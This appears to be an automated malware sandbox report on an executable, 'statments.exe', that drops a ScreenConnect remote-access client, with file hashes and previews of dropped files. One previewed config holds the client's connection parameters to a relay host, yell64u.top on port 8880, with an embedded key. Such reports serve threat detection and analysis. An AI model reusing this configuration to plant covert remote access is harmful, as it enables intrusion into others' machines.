                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81696
                                                                                  Entropy (8bit):5.862223562830496
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):3343
                                                                                  Entropy (8bit):4.771733209240506
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                  MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                  SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                  SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                  SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):939
                                                                                  Entropy (8bit):5.796466792414452
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                                  MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                                  SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                                  SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                                  SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):746
                                                                                  Entropy (8bit):5.349174276064173
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                  MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                  SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                  SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                  SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Users\user\Desktop\statments.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):321
                                                                                  Entropy (8bit):5.36509199858051
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                  MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                  SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                  SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                  SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):1086792
                                                                                  Entropy (8bit):7.793516535218678
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                  MD5:30CA21632F98D354A940903214AE4DE1
                                                                                  SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                  SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                  SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):234
                                                                                  Entropy (8bit):4.977464602412109
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                  MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                  SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                  SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                  SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                  Malicious:false
                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):4.62694170304723
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                  MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                  SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                  SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                  SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36864
                                                                                  Entropy (8bit):4.340550904466943
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                  MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                  SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                  SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                  SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):57344
                                                                                  Entropy (8bit):4.657268358041957
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                  MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                  SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                  SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                  SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):176128
                                                                                  Entropy (8bit):5.775360792482692
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                  MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                  SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                  SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                  SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.267782165666963
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                  MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                  SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                  SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                  SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\Desktop\statments.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966820870961015
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35I53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J3:bTiuYTXTtTPTkTZT
                                                                                  MD5:E3254148A3C68C70FE5F82E74F14EA56
                                                                                  SHA1:76B93779A3DC463F21541F8E8EB5C6441F3B7456
                                                                                  SHA-256:227280270EE12AF0A171D701BA568629E1A4F34F7497E41B820CD739A811DF92
                                                                                  SHA-512:4DF1EB227E926A04AF6FFD7E14E77F0EDD7789876993D715383A0C8F5886E356DAFF93B56C43BC5E135E2F51641AF04A17F09332842C81C6B1CA357519C26131
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966820870961015
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35I53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J3:bTiuYTXTtTPTkTZT
                                                                                  MD5:E3254148A3C68C70FE5F82E74F14EA56
                                                                                  SHA1:76B93779A3DC463F21541F8E8EB5C6441F3B7456
                                                                                  SHA-256:227280270EE12AF0A171D701BA568629E1A4F34F7497E41B820CD739A811DF92
                                                                                  SHA-512:4DF1EB227E926A04AF6FFD7E14E77F0EDD7789876993D715383A0C8F5886E356DAFF93B56C43BC5E135E2F51641AF04A17F09332842C81C6B1CA357519C26131
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):431084
                                                                                  Entropy (8bit):6.617587077964372
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:uuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvNss+:uuH2anwohwQUv5uH2anwohwQUvNss+
                                                                                  MD5:0A87745BDBD06BB3BD374CE494C7FC90
                                                                                  SHA1:2D34439C3830059E665E639F86A1A0D27B7A7205
                                                                                  SHA-256:687923C0D866D3246B26784E670282CC8E47846A0A41608E390DFBF0CCA6D4FF
                                                                                  SHA-512:22300D5078B44617E652CED1A116DBB0FC21B52BE46431AFD9B586323E9901465E844B1A1DD2B4535E06BED3C6FCEE27DA8858B142EDCDB29D9942112BDDDC0E
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI3C18.tmp, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@jpQY.@.....@.....@.....@.....@.....@......&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.1623013789989871
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72FjZSAGiLIlHVRpMh/7777777777777777777777777vDHF8RcT/CLp3XlN:JWQI5cY6F
                                                                                  MD5:761984FEC4913E8E062AD4B7B0F8F0FF
                                                                                  SHA1:E0EACAD4D078318BB6587B43503014C6AD88F44F
                                                                                  SHA-256:9A161953AF58EAA21725D0670862CEB89EAD17219C8ADACC3D8736CF70FBBEAE
                                                                                  SHA-512:32447EABB5ED28544FD4860C06F52975C83234D79E381B38F509358C387C6F7550F89FFA1B8D4606B7FC6E71AFF82CC517F0F1C4BF0A0F455BC6EFBE4038076B
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.797639887720556
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:P8PhVuRc06WX4IFT5tp97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:OhV14FTvWpYfbadwLmm34C
                                                                                  MD5:3945D7F3025C6E8C25805D401F82E6C8
                                                                                  SHA1:D5AB4D0DC97DFCE6B90E3F65E073CE746EABC516
                                                                                  SHA-256:6E69A138D6BBD179A8A45394CE5691C60C5B12D3F2044AA07233EAA6BDE9C8C3
                                                                                  SHA-512:3A7D70BC3599DF092DE9F67710A84E98C807E3F49C1A2979A62C5B99040F718A29429C48DFA011B5BE59A2402BF9577CA9495E275A1DE41DBFEB16CDE8B37746
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                                  Category:dropped
                                                                                  Size (bytes):7668
                                                                                  Entropy (8bit):7.864444854228408
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                                  MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                                  SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                                  SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                                  SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                                  Malicious:false
                                                                                  Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):360001
                                                                                  Entropy (8bit):5.362984411334502
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaun:zTtbmkExhMJCIpEy
                                                                                  MD5:8D182B94B35529E9932F70DD98D067B2
                                                                                  SHA1:12D901F049C91399091E8EDA5D820DE4865CF426
                                                                                  SHA-256:4FDA9010752563BDDD19445BD4A4AC27E240348A1CF13A32DC6C7B7814248FCE
